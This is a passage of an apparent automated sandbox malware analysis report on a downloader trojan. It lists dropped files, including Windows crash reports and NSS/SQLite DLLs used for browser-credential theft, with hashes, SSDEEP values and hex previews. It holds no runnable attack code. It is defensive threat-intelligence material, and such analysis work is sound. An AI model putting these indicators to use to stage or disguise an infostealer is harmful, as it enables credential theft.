Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.8.6.8.6.0.5.9.7.1.2.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.8.6.8.6.1.2.3.7.7.5.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.c.2.1.8.d.a.-.4.5.9.e.-.4.6.6.9.-.9.8.b.b.-.4.c.7.5.3.8.3.c.b.1.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.2.d.e.7.6.8.-.e.4.0.6.-.4.d.0.f.-.a.0.6.e.-.e.b.8.1.d.5.7.8.1.6.0.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.K.E.G.I.I.J.D.G.H...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.r.o.q.u.o.t.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.7.8.-.0.0.0.1.-.0.0.1.4.-.6.c.0.1.-.0.5.8.d.b.2.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.d.0.3.f.6.a.1.a.a.4.5.0.5.0.f.7.b.e.5.5.f.8.7.6.f.e.a.2.d.c.0.0.0.0.0.9.0.4.!.0.0.0.0.4.4.1.c.3.7.e.1.6.c.0.0.1.3.5.c.5.c.f.a.3.f.6.e.1.5.0.1.3.6.0.5.2.c.5.b.1.0.5.c.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_17777e9afe48e7bc3bc1c728b32fd3ffa03c4_b6772086_59ada311-90aa-4915-8843-6b16766ad845\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7555156410018964
Encrypted:	false
SSDEEP:	192:jn4Mns1NcjQ10BU/gju1zuiFPZ24IO8wY:lns1Nc0WBU/gjczuiFPY4IO8w
MD5:	518A5A2132F9EB385BAA37433F3769CF
SHA1:	6701D110596725398F5291148EFFB780ECE3EEC9
SHA-256:	83E2A3E38CA18530C70129810EC56754B1843624903F25095819BA4574DE59DD
SHA-512:	5F830BBD153A9F09954058A750D3548FEF49C00505124EFE01439B4D36ED029AF958F3563809D987EBD5E5D4D0BD85824E0C2221312997FF25233A4B5231D82E
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.8.6.8.1.4.2.4.3.7.5.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.8.6.8.1.4.7.2.8.1.4.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.a.d.a.3.1.1.-.9.0.a.a.-.4.9.1.5.-.8.8.4.3.-.6.b.1.6.7.6.6.a.d.8.4.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.e.b.4.e.b.1.-.a.9.7.f.-.4.e.e.9.-.8.1.3.d.-.8.7.0.8.5.2.9.3.b.e.e.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...T.r.o.j.a.n...D.o.w.n.L.o.a.d.e.r.4.7...4.3.4.7.7...2.9.8.5.2...1.9.4.1.0...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.r.o.q.u.o.t.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.6.8.-.0.0.0.1.-.0.0.1.4.-.6.5.e.3.-.8.9.7.1.b.2.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.d.0.3.f.6.a.1.a.a.4.5.0.5.0.f.7.b.e.5.5.f.8.7.6.f.e.a.2.d.c.0.0.0.0.0.9.0.4.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DB1.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 8 18:47:40 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	35042
Entropy (8bit):	1.737243364685692
Encrypted:	false
SSDEEP:	192:IeiCtqXO3AZrm03G38mMyDeNmthU8rFI:nQNG38mMeeNmthR
MD5:	BB63957B1D33F6040F59023151CBFDF6
SHA1:	A47AF8B55602B6FBC1DEE516607E3428070B8457
SHA-256:	7F578FAF7943874D63BABD70721C8060B45D1C377BB4C6545037E2A911F4CF7E
SHA-512:	1713F47A4A894BB9CA824CF170469D8074CE333FDB1B8D67711623B81B1C8B2B46487CF480386EDA1475AD4B0455944FA9A2F20920ED09833B3BA44194A16252
Malicious:	false
Preview:	MDMP..a..... .......L~.g........................X...............Z...........T.......8...........T...........@....\|......................................................................................................eJ......x.......GenuineIntel............T.......x...K~.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E5E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8414
Entropy (8bit):	3.707274397516348
Encrypted:	false
SSDEEP:	192:R6l7wVeJOy6H26YSR62g3WgmfDbcprT89bh/sfzBrm:R6lXJz6W6Ys6ogmfDb9hkfzw
MD5:	44DC6602DF1E297F6F2F062447DD9748
SHA1:	4E839C253C3234F52A738025EAFB971481E03D3E
SHA-256:	5846F9145774E1628A3FC48E092765943C0FE91800E57F83210E223E5FA46090
SHA-512:	BB9F1CD45A3A8A417283CD5DA7206310017FD0ED5BAAC1038643BCB8B5595E016DC6C373862A832E79535D3136A68A1738AB7E80D7DA138F6A321FE4E1068971
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F39.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4803
Entropy (8bit):	4.513687994222212
Encrypted:	false
SSDEEP:	48:cvIwWl8zs0MNJg77aI92iIWpW8VYOYm8M4JiJFP++q8v2+naF3//N/d:uIjf0MnI7hh7VuJw+KTa9//N/d
MD5:	7A03700135CA5E87A2E34BE7EE2C0C5A
SHA1:	AB8FBC36AD6BFF734BA57B32BEED27354EB2051A
SHA-256:	159C794263A2CAAE34044B5305375F1944B9EC1DE8094335328B4955ABC842F7
SHA-512:	3751C05DB6BD7D3E3544222544FED0E64643EEB45C0659902C522E9DB11D3AC0C1E9028EB4FFF091ECCBBB4D1CAF5234725B9F9C69CB661F020477FD342C9BB6
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534830" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE899.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 8 18:46:54 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	35854
Entropy (8bit):	1.7217394651288893
Encrypted:	false
SSDEEP:	96:578IB//mkQgbhQmQDx5CCQi73cHeS7lt6g19O73gGzrr8C7WIXbWItI0ax8JBggD:SiHv+cOytNg3hVzax8JBgg
MD5:	8D724A690A9E090157580C1B1FC5122F
SHA1:	DEBDB9DAF80579B62D087398AE7345E1ACF6BB69
SHA-256:	8E48C8D9C0164742110AEE367AAED23C29E0943281CE7E1CDDE8D0D155E0BA59
SHA-512:	CEF864CB1BD28C71DDFAB10C299B6AC28022BF3F36D2D546A957FA953FDF41E7253394A99DC3BC753A8ABB4661D3E76442875C8BA565CA7A19D8C2CA44A4FCEF
Malicious:	false
Preview:	MDMP..a..... ........~.g........................X...........................T.......8...........T...........@...........................................................................................................eJ......x.......GenuineIntel............T.......h....~.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE8F8.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8592
Entropy (8bit):	3.7062683416273283
Encrypted:	false
SSDEEP:	192:R6l7wVeJa76rL6YEIWSUvHgmf5fcprH89bF3sfZNj3m:R6lXJu6rL6YEZSUvHgmf5fBF8fZE
MD5:	4143F6DBB5F45D07CD86C3E2FFFE45E4
SHA1:	DC219DEC9AF6D5D8B6EF5A0A16B3EBB0B1055574
SHA-256:	48CD9FDD720657C2A4EDF2CF103B5C74DFF16BF9A03A5B0B5CB280C9A572C8A1
SHA-512:	9AD9F0ADC6CE7318C3C4B7F3BFE0FE133CFB8C46164DFB3B24677AA6F8566479D130D890373DEBE2274E18EB00BF31460F1E24E2D82AF65FAFEDAE5948684355
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.7.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE938.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5023
Entropy (8bit):	4.5855276380995935
Encrypted:	false
SSDEEP:	48:cvIwWl8zsvJg77aI92iIWpW8VYMYm8M4JQJFvb+q8vMimkoa0iDd:uIjfRI7hh7V0JSbKuLa0iDd
MD5:	7433E7AF7E74BEDD3F16BEB8D340F03E
SHA1:	AA4349765D60B9343EF6F0F76E19A465D66D2EDC
SHA-256:	C91221DBDDAE52E8DF1379892F37EF359764DF32443B823BEDA4DEC0161315E4
SHA-512:	4916FA0A0E249E5A83E92A11DB847E49EF598F31FF05F72FB859FA5402C2DDA621F621C09E3A7FF56416C2684D533528C66D9C5BB873777E9A13819E3007984C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534829" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 15PylGQjzK.exe, Detection: malicious, Browse Filename: Ji7kZhlqxz.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 20fUAMt5dL.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sql[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
